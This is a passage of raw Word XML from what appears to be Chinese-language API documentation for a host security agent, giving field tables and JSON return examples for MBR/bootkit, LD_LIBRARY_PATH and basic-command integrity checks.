          <w:p w14:paraId="79A5F323" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6D902E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C412852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>grub版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="482A536C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="377B3CEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDCBBDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68200BD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307308EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18E1FF6E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ACF4295" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msg_ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3A1AA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C1C7DC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C12660D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>上报消息版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C01599B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3110D86F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boot_mbr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E4BDA03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF78E10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(300)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A11E816" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>上磁盘的MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67427E74" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AD738F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>grub_mbr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB15BA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38153204" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(300)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="202C86F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>GRUB备份的MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22577A7A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFA2857" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>single_mbr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EA89A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77AF321D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17228510" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否磁盘有多份MBR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11024EA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EFB5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            com_id": "a85acd72128679169a0e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ts": 1533631489,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "boot_mbr": "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",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pcid": "1cc64150a44d57c4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "dist_ver": "CentOS release 6.9 (Final)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "grub_mbr": </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"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",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "grub_ver": "0.97",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "single_mbr": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "msg_ver": "bootkit 1.0.0"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DCAD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="检查功能动态链接库检查"/>
      <w:bookmarkEnd w:id="236"/>
      <w:r>
        <w:t>检查功能：动态链接库检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B92D1"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2343"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4C521B6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8EC274D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16ACAAD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7922A2F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40D1D12A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02277A8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F18AB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416381F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="217CF73C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522575DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AA28B49" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F952FD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>before_unset_output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595922EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B9DA415" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79AC8621" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装前路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AF62740" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78C64D8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>after_unset_output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A9A18D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B83C23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AE7D57F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装后路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78AC9ACE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="604CB257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>before_compare_after</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7962A99D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5911EF75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="201C4C6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据的对比</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10BBCD4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF84D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"ld_library_path": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "ret_msg": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "cmd": "/usr/bin/find",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "after_unset_output":{},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "before_unset_output":{},</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "before_compare_after":{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "ret_code": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41584110" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="检查功能基本命令检查"/>
      <w:bookmarkEnd w:id="237"/>
      <w:r>
        <w:t>检查功能：基本命令检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4E08C"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1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5E87172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8E73D9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A339975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38930D26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C6C3701" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4BB1042E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F8FFB52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>match_rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51A975EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1D9F65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2478DC88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令命中的规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A0F3E30" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60FA2A15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782D4B81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB698EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0415F972" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="057CBCB6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D1A4FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>modify_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B32074" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F0D1DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71AFEF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A122C1E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D605448" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="138E108C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1D7BCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2222BF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B431D14" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16333C63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46A0725D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14502FCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6346B964" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40563653" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BF4362" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C88EC80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE5EBE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
